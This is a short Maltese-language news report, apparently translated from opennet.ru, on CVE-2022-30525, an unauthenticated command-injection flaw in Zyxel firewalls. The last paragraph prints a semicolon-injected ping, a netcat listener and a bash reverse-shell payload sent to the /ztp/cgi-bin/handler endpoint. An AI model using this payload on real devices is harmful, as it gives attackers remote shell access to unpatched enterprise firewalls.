Vulnerabbiltà fil-firewalls Zyxel li tippermetti l-eżekuzzjoni tal-kodiċi mingħajr awtentikazzjoni

Ġiet identifikata vulnerabbiltà kritika (CVE-2022-30525) f'apparati Zyxel tas-serje ATP, VPN u USG FLEX, iddisinjati biex jorganizzaw l-operat ta 'firewalls, IDS u VPN fl-intrapriżi, li jippermetti lil attakkant estern jesegwixxi kodiċi fuq il- apparat mingħajr drittijiet tal-utent mingħajr awtentikazzjoni. Biex iwettaq attakk, attakkant irid ikun kapaċi jibgħat talbiet lill-apparat billi juża l-protokoll HTTP/HTTPS. Zyxel iffissa l-vulnerabbiltà fl-aġġornament tal-firmware ZLD 5.30. Skont is-servizz Shodan, bħalissa hemm 16213 apparat potenzjalment vulnerabbli fuq in-netwerk globali li jaċċettaw talbiet permezz HTTP/HTTPS.

L-operazzjoni titwettaq billi jintbagħtu kmandi ddisinjati apposta lill-web handler /ztp/cgi-bin/handler, aċċessibbli mingħajr awtentikazzjoni. Il-problema hija kkawżata min-nuqqas ta 'tindif xieraq tal-parametri tat-talba meta tesegwixxi kmandi fuq is-sistema billi tuża s-sejħa os.system użata fil-librerija lib_wan_settings.py u eżegwita meta tipproċessa l-operazzjoni setWanPortSt.

Pereżempju, attakkant jista' jgħaddi l-istring “; ping 192.168.1.210;" li se jwassal għall-eżekuzzjoni tal-kmand "ping 192.168.1.210" fuq is-sistema. Biex tikseb aċċess għall-qoxra tal-kmand, tista 'taħdem “nc -lvnp 1270” fis-sistema tiegħek, u mbagħad tibda konnessjoni inversa billi tibgħat talba lill-apparat bil-'; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Sors: opennet.ru

Żid kumment